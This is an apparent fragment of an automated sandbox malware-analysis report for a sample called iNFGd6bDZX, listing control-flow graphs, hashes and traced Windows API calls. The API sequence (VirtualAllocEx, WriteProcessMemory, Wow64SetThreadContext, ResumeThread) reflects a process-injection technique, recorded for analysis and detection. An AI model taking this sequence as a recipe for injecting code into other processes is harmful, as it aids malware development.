                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: b46d22fb6bce13b38d63d2e021c601f706e41778d70f001eedb87fa14cc719fc
                                                                                                                • Instruction ID: 229dfb7f1c828e0c8652bee0e856f5bf785ff1032e160d5d8173232327971399
                                                                                                                • Opcode Fuzzy Hash: b46d22fb6bce13b38d63d2e021c601f706e41778d70f001eedb87fa14cc719fc
                                                                                                                • Instruction Fuzzy Hash: 4D41EFB0C00619DFDB24DFA9C844BDEBBB6BF48304F24806AE418AB255DB756945CF91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 981 c77b5c-c79099 CreateActCtxA 984 c790a2-c790fc 981->984 985 c7909b-c790a1 981->985 992 c790fe-c79101 984->992 993 c7910b-c7910f 984->993 985->984 992->993 994 c79111-c7911d 993->994 995 c79120 993->995 994->995 997 c79121 995->997 997->997
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C79089
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 723cf241921c63287b8628b99eab5cb4ab90a99ed1cb1d8abddfcaea13c5ee52
                                                                                                                • Instruction ID: c39b67d1da369a9abe596abc88358cff120e8ab3626cb9946614f3e010768154
                                                                                                                • Opcode Fuzzy Hash: 723cf241921c63287b8628b99eab5cb4ab90a99ed1cb1d8abddfcaea13c5ee52
                                                                                                                • Instruction Fuzzy Hash: 0641C0B0C00719DFDB24DFAAC844B9EBBB6FF48304F24806AD419AB255DB756945CF90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 998 8eeb4e0-8eeb536 1000 8eeb538-8eeb544 998->1000 1001 8eeb546-8eeb585 WriteProcessMemory 998->1001 1000->1001 1003 8eeb58e-8eeb5be 1001->1003 1004 8eeb587-8eeb58d 1001->1004 1004->1003
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EEB578
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 4c38fbd1007a2b8cce6737a0bc8584eda3ab8ca9b51f17fe2abb710cad25dd3b
                                                                                                                • Instruction ID: 88e255491dae97b7e2a3e89be14191267fcd2b256d779257bcdbecce92a2c809
                                                                                                                • Opcode Fuzzy Hash: 4c38fbd1007a2b8cce6737a0bc8584eda3ab8ca9b51f17fe2abb710cad25dd3b
                                                                                                                • Instruction Fuzzy Hash: 012148B69002599FCB10CFA9C881BEEBBF1FF88324F10842EE959A7250C7749545CF64

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1008 8eeb4e8-8eeb536 1010 8eeb538-8eeb544 1008->1010 1011 8eeb546-8eeb585 WriteProcessMemory 1008->1011 1010->1011 1013 8eeb58e-8eeb5be 1011->1013 1014 8eeb587-8eeb58d 1011->1014 1014->1013
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EEB578
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 8e9e3478f44c6958d6e5ea2ebe15c6ea97e4f0f29c73c373adcbd38d9259ff28
                                                                                                                • Instruction ID: 44c5f2c2661d67623c68079ae6bd0bbb0972ce46295782196decf8d13c25ac24
                                                                                                                • Opcode Fuzzy Hash: 8e9e3478f44c6958d6e5ea2ebe15c6ea97e4f0f29c73c373adcbd38d9259ff28
                                                                                                                • Instruction Fuzzy Hash: 762128B19003599FCB10CFA9C885BDEBBF5FF48324F10842AE959A7250C7749554CBA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1018 8eeb348-8eeb39b 1020 8eeb39d-8eeb3a9 1018->1020 1021 8eeb3ab-8eeb3db Wow64SetThreadContext 1018->1021 1020->1021 1023 8eeb3dd-8eeb3e3 1021->1023 1024 8eeb3e4-8eeb414 1021->1024 1023->1024
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EEB3CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: f2d7d53db0a7672dac0e05de5942baa90f0285b6719bf130fe74974971f7df90
                                                                                                                • Instruction ID: 6eed3b52ae11d072d782c7692c4839f79f6f3af165485cf20017abc6b2e68448
                                                                                                                • Opcode Fuzzy Hash: f2d7d53db0a7672dac0e05de5942baa90f0285b6719bf130fe74974971f7df90
                                                                                                                • Instruction Fuzzy Hash: 60216AB19003098FDB10DFAAC4857EEBFF0AF88324F14842ED459A7241C7B89545CFA1
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EEB658
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 347ca1c78bb4625a0f0afcfff4567ff07acf8d93c8f5295f43a24aa42e121dad
                                                                                                                • Instruction ID: 953ad132cfd293c7b90786cf9ef8db35fbdf50a72e1557445475d527a1822827
                                                                                                                • Opcode Fuzzy Hash: 347ca1c78bb4625a0f0afcfff4567ff07acf8d93c8f5295f43a24aa42e121dad
                                                                                                                • Instruction Fuzzy Hash: 8D2139B18002599FCB10DFAAC841AEEBBF1FF48320F10852EE569A7250C7349544CBA4
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EEB3CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: c35a68b91ad619972c00b0d68f6aada37f154086371e02fb316c026a82860e13
                                                                                                                • Instruction ID: 1bcc6649352db58e5bd095c2e9d6c8ccde17397946cbbfae7883d9e4661f4b80
                                                                                                                • Opcode Fuzzy Hash: c35a68b91ad619972c00b0d68f6aada37f154086371e02fb316c026a82860e13
                                                                                                                • Instruction Fuzzy Hash: BF2129B19003098FDB10DFAAC4857EEBBF4EF88324F14842ED459A7241D778A945CFA5
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EEB658
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: a6c6234763b62fe76ef29fb334fd7bb6cc6d2aa18a37a496c808d8541dac78d5
                                                                                                                • Instruction ID: 3ec12222b61c4d16013d5f29cdb03d6f9b53526d942f1f6d9507121d69e6839e
                                                                                                                • Opcode Fuzzy Hash: a6c6234763b62fe76ef29fb334fd7bb6cc6d2aa18a37a496c808d8541dac78d5
                                                                                                                • Instruction Fuzzy Hash: 072139B18003599FCB10DFAAC841BEEFBF5FF48320F10842AE558A7250C7349554CBA5
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EEB496
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: d9bbab45756a35b182459a851a62ae06d3cb602a260793327915fede9f46922b
                                                                                                                • Instruction ID: 4defa0b7ce83cbef32a49ab935a7a1431de78ef1a24f8b5d38f9b40ca98681ce
                                                                                                                • Opcode Fuzzy Hash: d9bbab45756a35b182459a851a62ae06d3cb602a260793327915fede9f46922b
                                                                                                                • Instruction Fuzzy Hash: E12159B28042499FCB10DFA9C844BEEBFF5EF89324F24881DE459A7250C7759554CFA1
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EEB496
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: b75b4a055e28f2cedf096409644c4cd82f177895ffd18016b016b6ea524a093c
                                                                                                                • Instruction ID: 2053b1301ced62e3c13cea961b4825d29f98e7f79748123e2db6700f352fe436
                                                                                                                • Opcode Fuzzy Hash: b75b4a055e28f2cedf096409644c4cd82f177895ffd18016b016b6ea524a093c
                                                                                                                • Instruction Fuzzy Hash: 201167B28002498FCB10DFAAC844BDEBFF5EF88320F108819E519A7250C735A540CFA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 07d4382f4a8c9558694feaa3eec4b3645f39433d9a5ad7cefae622b0928071aa
                                                                                                                • Instruction ID: 94809d67684e5b1dbce423b1cd5804c59140515503470b3b2939c0bb3a016853
                                                                                                                • Opcode Fuzzy Hash: 07d4382f4a8c9558694feaa3eec4b3645f39433d9a5ad7cefae622b0928071aa
                                                                                                                • Instruction Fuzzy Hash: 961113B19002488FDB24DFAAC4457EEFFF5AF88324F24842ED459A7250CA75A944CFA5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 6b2542e303dbb6e02d1c556499faba76a077da93ab88a5f9b66c38b38ae8b1b6
                                                                                                                • Instruction ID: db908d07a8c0aae97f60008fc847027854b46efd04a0d5e4a1ae11e41c0a4045
                                                                                                                • Opcode Fuzzy Hash: 6b2542e303dbb6e02d1c556499faba76a077da93ab88a5f9b66c38b38ae8b1b6
                                                                                                                • Instruction Fuzzy Hash: 621125B19002488FCB20DFAAC4457EEFBF4AF88324F20842AD459A7250CB75A944CBA5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 08EEE65D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 5d6a1ec1ff707fbf3f97d03192dfb4fd5a999bb3edec95be73c0846f4c8ebc56
                                                                                                                • Instruction ID: 01428c438b39780acb986feea34d4cce41c6f9694cfc97e773a3103336fd7f38
                                                                                                                • Opcode Fuzzy Hash: 5d6a1ec1ff707fbf3f97d03192dfb4fd5a999bb3edec95be73c0846f4c8ebc56
                                                                                                                • Instruction Fuzzy Hash: A71106B5800349DFCB10DF9AD445BDEBBF8EB48320F10841AE569B7210C375A954CFA5
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C7E7DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: ce77e0e8b37003c8808d0d6fa541c0c12a45442ae6287dcb6284df4590127925
                                                                                                                • Instruction ID: 02fe2677acb873e42e8556b0293b350f845394c766aed479902f83730fb3fc6f
                                                                                                                • Opcode Fuzzy Hash: ce77e0e8b37003c8808d0d6fa541c0c12a45442ae6287dcb6284df4590127925
                                                                                                                • Instruction Fuzzy Hash: AD11E0B6C00249CFCB14CF9AD444ADEFBF9AF88324F10C46AD869A7210D375A545CFA5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 08EEE65D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: d6cd77b6b8ed95920dea3d5042d270c88c3fa75782f84ef8ef2c5baded013a33
                                                                                                                • Instruction ID: 561f9eb6d351c47d8e40f40a0770a180eefaf34e9958f21183dcf6cfddf2798a
                                                                                                                • Opcode Fuzzy Hash: d6cd77b6b8ed95920dea3d5042d270c88c3fa75782f84ef8ef2c5baded013a33
                                                                                                                • Instruction Fuzzy Hash: 1211F2B58002499FCB10CF9AD485BEEBFF4EB48320F14885AE469A7211C3B5A554CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1723655346.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_bdd000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: af51c5ceb246c1781e289036adcd322530e5c9f1ce73002be39c2ff1238a4fc7
                                                                                                                • Instruction ID: ea82f403132636e690c0e3853eb02ded9b28cbd18de6e9fe6e06cb68332c7bf1
                                                                                                                • Opcode Fuzzy Hash: af51c5ceb246c1781e289036adcd322530e5c9f1ce73002be39c2ff1238a4fc7
                                                                                                                • Instruction Fuzzy Hash: 3D212571500204DFDB05DF14D9C0B2AFFA5FB98324F20C6AAE9494B356D336E856CAA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1723709271.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_bed000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 95c1c8fe01435508362e276654f8e70cd4c00fc4764b774446ceb41f281d5224
                                                                                                                • Instruction ID: b7a09ac6b5dcb0f3567fbaa9a16fac67702bf0077cd66a8a86dbc9c0330cd85d
                                                                                                                • Opcode Fuzzy Hash: 95c1c8fe01435508362e276654f8e70cd4c00fc4764b774446ceb41f281d5224
                                                                                                                • Instruction Fuzzy Hash: 9D21F271604280DFCB14DF15D9D4B26BBA5FB84314F28C5ADD80A4B297C3BAD847CA61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1723709271.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_bed000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f6ccdebbb06e4b2bab58f9dad2a7c5fdb82631ab6f3d104d3b34998694fdad3e
                                                                                                                • Instruction ID: bf970bc0bc59c2620b5907c30b3c387694d7af79bbb3c5306e72521d5cf4a353
                                                                                                                • Opcode Fuzzy Hash: f6ccdebbb06e4b2bab58f9dad2a7c5fdb82631ab6f3d104d3b34998694fdad3e
                                                                                                                • Instruction Fuzzy Hash: A321A4755093C08FCB02CF20D594715BFB1EB45314F28C5EAD8498B297C33AD80ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1723655346.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_bdd000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction ID: 2bb0975c039676d4721197191ee6fb7359f2934b3dd43542566f9442111a43f1
                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction Fuzzy Hash: E511CD72504240DFCB16CF00D5C4B16BFA1FB94324F24C2AAD8490A356C33AE85ACBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d1b1be991dc7e80ce7ead37a8b4abb71c79ec1bb11fa25d6490438eddc0d3d5
                                                                                                                • Instruction ID: abcd3f7db100e485b48396fa125a5fdf94c7eb18eef6710348cc804f25ef2770
                                                                                                                • Opcode Fuzzy Hash: 6d1b1be991dc7e80ce7ead37a8b4abb71c79ec1bb11fa25d6490438eddc0d3d5
                                                                                                                • Instruction Fuzzy Hash: D0E10A75E002298FCB14DFA9C5809AEFBF2FF89305F249169E415AB356D731A942CF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a786ebde58604f674398d12604cc22efa2dbc757500cbfbbec0e50c4caa7d447
                                                                                                                • Instruction ID: 3282a0e7032b0b4fb2ebc37ffbf2d62ff78d43144ae2b305688812778bdb9028
                                                                                                                • Opcode Fuzzy Hash: a786ebde58604f674398d12604cc22efa2dbc757500cbfbbec0e50c4caa7d447
                                                                                                                • Instruction Fuzzy Hash: 29E14A74E001298FCB14DFA9C5809AEFBB2FF89305F249269E405AB356D731AD42CF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8748d94ce072830eb64d9c70aa2d563b5f0bc058182df23ae2eb351a523b863
                                                                                                                • Instruction ID: eab05f48fb76ff1ae5348773d98b759c94fe2835a857dc56e996bec8a877caa2
                                                                                                                • Opcode Fuzzy Hash: d8748d94ce072830eb64d9c70aa2d563b5f0bc058182df23ae2eb351a523b863
                                                                                                                • Instruction Fuzzy Hash: 06E11875E002198FCB14DFA9C5809AEFBF2FF89305F249169E415AB356D731A942CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c367164397ab1a874b81069a8841180bac1f049f9290bf825b679350474ae1de
                                                                                                                • Instruction ID: 6ba5b3f136c06d54b69aa5db90ff53c383f290401218e0b12c36d3cf5adeca1e
                                                                                                                • Opcode Fuzzy Hash: c367164397ab1a874b81069a8841180bac1f049f9290bf825b679350474ae1de
                                                                                                                • Instruction Fuzzy Hash: 5FE11974E002298FCB14DFA9D5809AEFBB2BF89305F249169E415AB356D731A942CF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9e630741f9e266e5c6807970178b117ca3c2c16a4f1a2bd46470b9d5058384ff
                                                                                                                • Instruction ID: f67eab19e89877c2f9694a04f9b8a8b5ad271077b5dd9782566d3030ec92d32d
                                                                                                                • Opcode Fuzzy Hash: 9e630741f9e266e5c6807970178b117ca3c2c16a4f1a2bd46470b9d5058384ff
                                                                                                                • Instruction Fuzzy Hash: 8AE11A75E001298FCB14DFA9C5809AEFBF2FF88305F249169E815AB356D731A942CF61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ff609ca52d22626812d3d12736610bfbb2a7b142e92afbe4b0532d245b2c7ed7
                                                                                                                • Instruction ID: 8fce8587e6e1ae92f4ded64ed9a1fea46421bd291785dddaa67883143358d6aa
                                                                                                                • Opcode Fuzzy Hash: ff609ca52d22626812d3d12736610bfbb2a7b142e92afbe4b0532d245b2c7ed7
                                                                                                                • Instruction Fuzzy Hash: A8410632614245CFD725CBBDD841A2AB7F2EB94350B25C82AD06ADB764C334E941CF12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6ac03eb2d519da2273bc77bc3908689dca4dfca0f78fc79819990438e715c51c
                                                                                                                • Instruction ID: 266fdb1ff074fadd2785733142edb1bec5e8675b84b2370a458b87f0ae6c7152
                                                                                                                • Opcode Fuzzy Hash: 6ac03eb2d519da2273bc77bc3908689dca4dfca0f78fc79819990438e715c51c
                                                                                                                • Instruction Fuzzy Hash: F841B632B14645CFD724CABED841A6AB7F6EB94350B24C826D06ADB764D334E941CF11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3407c467d155245cfb623483b46ca0b0804ada6d7a3f74abc56dc7d408808c5
                                                                                                                • Instruction ID: ad72ef4ae8bc9a7a34dfba013a622797042fad7aee7c115b7249c3c52d889071
                                                                                                                • Opcode Fuzzy Hash: e3407c467d155245cfb623483b46ca0b0804ada6d7a3f74abc56dc7d408808c5
                                                                                                                • Instruction Fuzzy Hash: 72310B71F1C295CFC7448F69C84556DBBB1EB88310F11C16BE50AEB391D734CA01AB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d2f99f2db1db09daac01739cba371fb89a638a37c9acf68f5da69acba3310ca5
                                                                                                                • Instruction ID: 3ac16b87472721ec88eb728cf6aab65c50a60e6403c16892f5deb5832150ff5d
                                                                                                                • Opcode Fuzzy Hash: d2f99f2db1db09daac01739cba371fb89a638a37c9acf68f5da69acba3310ca5
                                                                                                                • Instruction Fuzzy Hash: 4C31F871F18255CBCB448F5DC84556EBBB5EB88310F11C12BE90AEB391D734DE01AB96

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:11.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:203
                                                                                                                Total number of Limit Nodes:23
